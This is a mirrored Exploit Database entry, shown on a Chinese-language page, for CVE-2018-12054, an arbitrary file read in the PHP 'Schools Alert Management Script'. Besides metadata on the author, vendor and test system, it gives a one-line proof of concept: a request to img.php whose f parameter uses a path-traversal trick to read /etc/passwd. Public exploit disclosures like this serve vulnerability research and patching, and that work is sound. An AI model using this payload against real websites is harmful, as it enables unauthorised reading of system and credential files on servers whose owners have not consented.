Schools Alert Management Script – Arbitrary File Read

• Exploit Database
• 112 阅读

• 作者： M3@Pandas
  日期： 2018-06-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/44874/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14

  # Exploit Title: Schools Alert Management Script - Arbitrary File Read # Date: 2018-06-07 # Vendor Homepage: https://www.phpscriptsmall.com/ # Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/ # Category: Web Application # Exploit Author: M3@Pandas # Web: https://github.com/unh3x/just4cve/issues/4 # Tested on: Linux Mint # CVE: CVE-2018-12054   # Proof of Concept：   /img.php?f=/./etc/./passwd